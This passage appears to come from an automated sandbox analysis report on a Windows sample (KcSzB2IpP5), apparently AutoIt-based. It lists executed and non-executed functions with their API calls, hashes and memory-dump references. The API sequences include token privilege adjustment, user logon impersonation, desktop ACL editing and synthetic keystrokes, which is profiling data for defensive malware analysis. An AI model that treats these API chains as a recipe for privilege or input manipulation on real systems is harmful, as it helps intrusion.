Opcode ID: 14ff9992973f433bb1ec644c3419a615da367efb01512def948d8b31e6080b2f
Instruction ID: f000805b50ce1d6bc5c128511765f5469338afa2b11bb6e73dc5648f7e877292
Opcode Fuzzy Hash: 14ff9992973f433bb1ec644c3419a615da367efb01512def948d8b31e6080b2f
Instruction Fuzzy Hash: 9911487190420AAFCF05DF58E94199F7BF8EF49304F10406AF808AB312EA30DA11CBA9

Function 00495000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00494C7D: RtlAllocateHeap.NTDLL(00000008,00461129,00000000,?,00492E29,00000001,00000364,?,?,?,0048F2DE,00493863,00531444,?,0047FDF5,?), ref: 00494CBE

_free.LIBCMT ref: 0049506C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 17135696c441036e4cbfa50098af699cce082b653dc673365b13c32f8484ea44
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 21012B722047056BE7228F55D84195AFFE8FB85370F25062EE18493280E6746805C7B8

Function 0048E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: b05e004fbb68848a533975a627dcdc7b31214fb4c1cd952c53b6f92ada32c56a
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 1CF0FE32511A1496DA313A6B8C05B5F37585F52338F140F2FF424A22D1DB7C9802879D

Function 00494C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00461129,00000000,?,00492E29,00000001,00000364,?,?,?,0048F2DE,00493863,00531444,?,0047FDF5,?), ref: 00494CBE

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9bc8a5c9ed96c7e969c8309470c0a7a9fe543fc27dabe53f6e642369b7e78e70
Instruction ID: 65fac965264328701096591119b2103443c7c252edef439c8b4fa893e7f4e98a
Opcode Fuzzy Hash: 9bc8a5c9ed96c7e969c8309470c0a7a9fe543fc27dabe53f6e642369b7e78e70
Instruction Fuzzy Hash: FEF090316022246E9F216E62D905F5B3B88AFD17A5B164637B815A72C0CA28D80296A8

Function 00493820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00531444,?,0047FDF5,?,?,0046A976,00000010,00531440,004613FC,?,004613C6,?,00461129), ref: 00493852

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2657d59b5c88bbaa9d6abe51b599db8191c8d842f2bc6546a84bbbef32648747
Instruction ID: 4323cec307e4c46ee4b0038842900c12d9aa1aef4ea9f121a52cc30b6397a8be
Opcode Fuzzy Hash: 2657d59b5c88bbaa9d6abe51b599db8191c8d842f2bc6546a84bbbef32648747
Instruction Fuzzy Hash: 54E0E53110062556DE21BE779C04B9B3EC9AF837B6F050877BD0592AC0CB19DD0192ED

Function 00464F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,00531418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00464F6D

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 3b471c17241332f20096f1459e055ff879eee7deb3689a0f303e95cb055ffd9a
Instruction ID: f8d4782479815df71f48d66676316349fee8c8ce5a03d468346f19d589ea2a01
Opcode Fuzzy Hash: 3b471c17241332f20096f1459e055ff879eee7deb3689a0f303e95cb055ffd9a
Instruction Fuzzy Hash: 7DF0A070105311CFCF3C9F20D490822B7E0AF54319310897FE1DA82611D7359C44DF0A

Function 00462DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00462DC4

Part of subcall function 00466B57: _wcslen.LIBCMT ref: 00466B6A

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 76f32fd4d2240c9a4dc8219c0acd2a1efd9933c6b8f2e1fe7fa7a5a9898b75e5
Instruction ID: 5689603448f2d111d424aa5c632d06ebe82f5e481cf05241aca1da93fbc1288d
Opcode Fuzzy Hash: 76f32fd4d2240c9a4dc8219c0acd2a1efd9933c6b8f2e1fe7fa7a5a9898b75e5
Instruction Fuzzy Hash: 0EE07D72A001245BC71092588C05FEA73DDDFC8790F0100B6FC09D3208D964BC80C554

Function 00462B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00463837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00463908

Part of subcall function 0046D730: GetInputState.USER32 ref: 0046D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00462B6B

Part of subcall function 004630F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0046314E

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: f298e02f492795fb6122e76a79a0f05d11da253044bf1ef3d53cc4ec4fa2aea7
Instruction ID: 1ca34b0869303d5606a82ecfba1ceffb5a0616460cb7b1bdfcbd344b60cf2c96
Opcode Fuzzy Hash: f298e02f492795fb6122e76a79a0f05d11da253044bf1ef3d53cc4ec4fa2aea7
Instruction Fuzzy Hash: 78E0262170028402CA08BF72A8524BDA789DBE135AF00143FF442432A2EE6C4949821F

Function 004A039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,004A0704,?,?,00000000,?,004A0704,00000000,0000000C), ref: 004A03B7

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c8154b22ece8ea75a2689e515924043fb99f0f02db239fec63ab14d08044edcc
Instruction ID: bd59fe940186df5d073eef5fe188abda8d2b8c12641ad9e9d1e66a3aaacbcd1b
Opcode Fuzzy Hash: c8154b22ece8ea75a2689e515924043fb99f0f02db239fec63ab14d08044edcc
Instruction Fuzzy Hash: 92D06C3204010DBBDF028F84DE46EDA3BAAFB48714F014010BE1856020C732E831EB94

Function 00461CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00461CBC

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: c905f79d5f9daae834c8abda66639e99c5fe373a999a7b5a3b66c21c550c38ba
Instruction ID: 7c2f865e87c33a1c27c527fd8a43a9fac2a669d0e8334d2acbffce96012a74ea
Opcode Fuzzy Hash: c905f79d5f9daae834c8abda66639e99c5fe373a999a7b5a3b66c21c550c38ba
Instruction Fuzzy Hash: A0C09B35280704AFF2144790BD4AF107754A358B01F044401F609596E3C3A11428FA54

Function 010263B8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 010263C9

Memory Dump Source

Source File: 00000000.00000002.1334121532.0000000001024000.00000040.00000020.00020000.00000000.sdmp, Offset: 01024000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1024000_KcSzB2IpP5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 0f7183b32231d2f0f869b3f6e19f6fb77abf94f4b998b280e6a88cd4f4ccd936
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: C8E0E67494010DDFDB00DFB4D5496DD7BB4EF04302F104161FD01D2281D6319D508A72

Non-executed Functions

Function 004F9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00479BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00479BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004F961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004F965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 004F969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004F96C9
SendMessageW.USER32 ref: 004F96F2
GetKeyState.USER32(00000011), ref: 004F978B
GetKeyState.USER32(00000009), ref: 004F9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004F97AE
GetKeyState.USER32(00000010), ref: 004F97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004F97E9
SendMessageW.USER32 ref: 004F9810
SendMessageW.USER32(?,00001030,?,004F7E95), ref: 004F9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004F992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004F9941
SetCapture.USER32(?), ref: 004F994A
ClientToScreen.USER32(?,?), ref: 004F99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004F99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004F99D6
ReleaseCapture.USER32 ref: 004F99E1
GetCursorPos.USER32(?), ref: 004F9A19
ScreenToClient.USER32(?,?), ref: 004F9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 004F9A80
SendMessageW.USER32 ref: 004F9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 004F9AEB
SendMessageW.USER32 ref: 004F9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004F9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 004F9B4A
GetCursorPos.USER32(?), ref: 004F9B68
ScreenToClient.USER32(?,?), ref: 004F9B75
GetParent.USER32(?), ref: 004F9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 004F9BFA
SendMessageW.USER32 ref: 004F9C2B
ClientToScreen.USER32(?,?), ref: 004F9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004F9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 004F9CDE
SendMessageW.USER32 ref: 004F9D01
ClientToScreen.USER32(?,?), ref: 004F9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004F9D82

Part of subcall function 00479944: GetWindowLongW.USER32(?,000000EB), ref: 00479952

GetWindowLongW.USER32(?,000000F0), ref: 004F9E05

Strings

F, xrefs: 004F9D07
@GUI_DRAGID, xrefs: 004F997D
p#S, xrefs: 004F9990

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#S
API String ID: 3429851547-426476995
Opcode ID: 3d6fba73615dd626450ecde7068d0e1ada8603233728cbe48ae44f48737baaa1
Instruction ID: cc42cd357dd766c86aba7905d890b814064142c67ad611e68d4b822d3cfcbcde
Opcode Fuzzy Hash: 3d6fba73615dd626450ecde7068d0e1ada8603233728cbe48ae44f48737baaa1
Instruction Fuzzy Hash: 09428B31204208AFE724CF24C984BBABBE5FF49714F14061AF699C73A1D735AC65CB4A

Function 004F4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004F48F3
SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 004F4908
SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 004F4927
SendMessageW.USER32(?,00000148,00000000,00000000), ref: 004F494B
SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 004F495C
SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 004F497B
SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 004F49AE
SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 004F49D4
SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 004F4A0F
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004F4A56
SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 004F4A7E
IsMenu.USER32(?), ref: 004F4A97
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004F4AF2
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 004F4B20
GetWindowLongW.USER32(?,000000F0), ref: 004F4B94
SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 004F4BE3
SendMessageW.USER32(00000000,00001001,00000000,?), ref: 004F4C82
wsprintfW.USER32 ref: 004F4CAE
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004F4CC9
GetWindowTextW.USER32(?,00000000,00000001), ref: 004F4CF1
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004F4D13
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 004F4D33
GetWindowTextW.USER32(?,00000000,00000001), ref: 004F4D5A

Strings

%d/%02d/%02d, xrefs: 004F4CA8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
String ID: %d/%02d/%02d
API String ID: 4054740463-328681919
Opcode ID: 319a86d16bdc293ae854021f9224e95ea343ad17b208c01399dac68ee3c2d5ac
Instruction ID: 6a31cd53bed435b421caaf9a0d26c30907b2ec6afa8d854c5a7819fd32b7e7d2
Opcode Fuzzy Hash: 319a86d16bdc293ae854021f9224e95ea343ad17b208c01399dac68ee3c2d5ac
Instruction Fuzzy Hash: 0912E471500258ABEB248F28CC49FBF7BF4EF85314F10412AFA19DA2E1DB789941CB58

Function 0047F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0047F998
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004BF474
IsIconic.USER32(00000000), ref: 004BF47D
ShowWindow.USER32(00000000,00000009), ref: 004BF48A
SetForegroundWindow.USER32(00000000), ref: 004BF494
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004BF4AA
GetCurrentThreadId.KERNEL32 ref: 004BF4B1
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004BF4BD
AttachThreadInput.USER32(?,00000000,00000001), ref: 004BF4CE
AttachThreadInput.USER32(?,00000000,00000001), ref: 004BF4D6
AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 004BF4DE
SetForegroundWindow.USER32(00000000), ref: 004BF4E1
MapVirtualKeyW.USER32(00000012,00000000), ref: 004BF4F6
keybd_event.USER32(00000012,00000000), ref: 004BF501
MapVirtualKeyW.USER32(00000012,00000000), ref: 004BF50B
keybd_event.USER32(00000012,00000000), ref: 004BF510
MapVirtualKeyW.USER32(00000012,00000000), ref: 004BF519
keybd_event.USER32(00000012,00000000), ref: 004BF51E
MapVirtualKeyW.USER32(00000012,00000000), ref: 004BF528
keybd_event.USER32(00000012,00000000), ref: 004BF52D
SetForegroundWindow.USER32(00000000), ref: 004BF530
AttachThreadInput.USER32(?,000000FF,00000000), ref: 004BF557

Strings

Shell_TrayWnd, xrefs: 004BF46F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 666a8689211e5d59024f401a0039c0192f67ef92a332241193c5e2e0855d706d
Instruction ID: 19d65b6aba099f00bfc466ff9884309b41d3bb2d83b1f1761cf8407e43c2e67d
Opcode Fuzzy Hash: 666a8689211e5d59024f401a0039c0192f67ef92a332241193c5e2e0855d706d
Instruction Fuzzy Hash: 2E316171A4022CBBEB206BB55D8AFBF7E6CEB44B50F100076FA04E61D1C6B45D10EA79

Function 004C1201 Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON

Download Yara Rule

APIs

Part of subcall function 004C16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004C170D
Part of subcall function 004C16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004C173A
Part of subcall function 004C16C3: GetLastError.KERNEL32 ref: 004C174A

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004C1286
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004C12A8
CloseHandle.KERNEL32(?), ref: 004C12B9
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004C12D1
GetProcessWindowStation.USER32 ref: 004C12EA
SetProcessWindowStation.USER32(00000000), ref: 004C12F4
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004C1310

Part of subcall function 004C10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004C11FC), ref: 004C10D4
Part of subcall function 004C10BF: CloseHandle.KERNEL32(?,?,004C11FC), ref: 004C10E9

Strings

winsta0, xrefs: 004C12CC
ZR, xrefs: 004C1392
, xrefs: 004C125A
default, xrefs: 004C130B

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$ZR
API String ID: 22674027-1991190340
Opcode ID: 7d586e55612c92a83678be4eadc243c73a793c73fc2be8fd87f5ef85748e57c0
Instruction ID: ffc626af84c7476ade7f878221c0a68ad1dc82e1ab3eb710271db96b982b2823
Opcode Fuzzy Hash: 7d586e55612c92a83678be4eadc243c73a793c73fc2be8fd87f5ef85748e57c0
Instruction Fuzzy Hash: 8181AE75900209AFDF159FA4DD49FEF7BB9EF05304F04416EF910A22A1D7388954CB28

Function 004C0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004C10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004C1114
Part of subcall function 004C10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C1120
Part of subcall function 004C10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C112F
Part of subcall function 004C10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004C0B9B,?,?,?), ref: 004C1136
Part of subcall function 004C10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004C114D

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004C0BCC
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004C0C00
GetLengthSid.ADVAPI32(?), ref: 004C0C17
GetAce.ADVAPI32(?,00000000,?), ref: 004C0C51
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004C0C6D
GetLengthSid.ADVAPI32(?), ref: 004C0C84
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004C0C8C
HeapAlloc.KERNEL32(00000000), ref: 004C0C93
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004C0CB4
CopySid.ADVAPI32(00000000), ref: 004C0CBB
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004C0CEA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004C0D0C
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004C0D1E
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C0D45
HeapFree.KERNEL32(00000000), ref: 004C0D4C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C0D55
HeapFree.KERNEL32(00000000), ref: 004C0D5C
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004C0D65
HeapFree.KERNEL32(00000000), ref: 004C0D6C
GetProcessHeap.KERNEL32(00000000,?), ref: 004C0D78
